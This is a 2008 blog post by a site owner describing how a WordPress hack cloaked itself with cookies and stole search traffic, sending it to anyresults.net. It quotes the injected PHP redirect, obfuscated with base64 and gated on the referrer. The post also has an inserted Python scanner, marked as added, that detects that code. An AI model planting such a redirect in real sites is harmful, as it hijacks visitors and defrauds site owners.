WordPress Hacked, Search Engine Traffic Stolen by AnyResults.net

by Michael on June 5, 2008 · 5 comments

Something scary happened today at one of my other sites. Around 3:30 EDT, I noticed that I was getting many fewer visitors than normal. Upon further investigation, I realized that my search engine traffic had all but dried up. Thinking I had been banned by Google, I dug deeper.

Oddly enough, I still ranked well for all of the terms that had brought me traffic in the past. So what was happening? If I was still ranking well in the SERPs, why weren’t people clicking through?

Unsure of what else to do, I enlisted the help of some friends. Among other things, I asked these guys to search for a few keywords to see if my rankings were holding up. As it turns out, my search results were just fine, ruling out the possibility that Google had rolled out new search data that simply hadn’t filtered down to our neck of the woods.

And then it happened…

One of my friends clicked on a Google search result and was redirected elsewhere. But when he clicked it again, all was well. When I reported this to another friend, he saw something similar.

As it turns out, I was the victim of a WordPress hack that stole pretty much all of my search traffic, but somehow hid itself using cookies. Upon further inspection, I discovered the following bit of code at the top of index.php:

$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>

If you hit Google without the cookie and tried to click through to my site, you were directed elsewhere. But once it had happened to you, it couldn’t be repeated until you cleared your cookies. Very sneaky.
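A defender's check for this pattern, as an added example that is not part of the original post: a small Python scanner that flags PHP source combining a `Location:` redirect with a referrer test or a base64-encoded string, and decodes the hidden host. The function names and the clean sample file are assumptions made for illustration.

```python
import base64
import binascii
import re

# Patterns for the three traits of the injected snippet quoted in the post.
REFERER = re.compile(r"\$_SERVER\[\s*['\"]HTTP_REFERER['\"]\s*\]")
COOKIE = re.compile(r"\$_COOKIE")
REDIRECT = re.compile(r"header\s*\(\s*['\"]Location:", re.IGNORECASE)
B64_CALL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def decode_literals(source):
    """Decode every string literal passed directly to base64_decode()."""
    decoded = []
    for blob in B64_CALL.findall(source):
        try:
            raw = base64.b64decode(blob, validate=True)
            decoded.append(raw.decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            decoded.append("<undecodable: %s>" % blob)
    return decoded


def scan_php(source):
    """Report which cloaked-redirect traits appear in a PHP file's text."""
    traits = {
        "referer_check": bool(REFERER.search(source)),
        "cookie_check": bool(COOKIE.search(source)),
        "location_redirect": bool(REDIRECT.search(source)),
    }
    hidden = decode_literals(source)
    # A redirect gated on the referrer, or built from an encoded string,
    # is not something a front controller like index.php should contain.
    suspicious = traits["location_redirect"] and (traits["referer_check"] or bool(hidden))
    return {"suspicious": suspicious, "traits": traits, "decoded": hidden}


# The two lines quoted in the post.
INJECTED = r'''$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>'''

# Constructed sample of an unmodified front controller (an assumption).
CLEAN = "<?php\ndefine('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n"

if __name__ == "__main__":
    for name, text in (("injected", INJECTED), ("clean", CLEAN)):
        print(name, scan_php(text))
```

Because the redirect only fires for cookie-less visitors arriving from a search engine, checking the files on disk this way is more reliable than browsing the site yourself.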

So where was all of my traffic going?

It was being shunted through www.anyresults.net (no link for you!) and then winding up at a spammy, ad-filled landing page on www.dealtime.com (again, no link for you — I’ve helped enough today). I suspect that dealtime.com had likewise been compromised, though I can’t say for sure.

I’m still not sure how they got in, but I’ve reported it to my host, cleaned everything up, and changed all of my passwords. For reference, I was running WordPress 2.3.3, though I have since upgraded to WordPress 2.5.1.

Before you ask, yes, I’m aware that I was taking a slight risk by running a slightly older version of WordPress. In my defense, however, early releases of major WordPress updates often have numerous bugs of their own. As such, I typically wait until at least X.X.2 before upgrading unless a serious hole is discovered in the version that I’m currently using.

Guess what? I just found one.
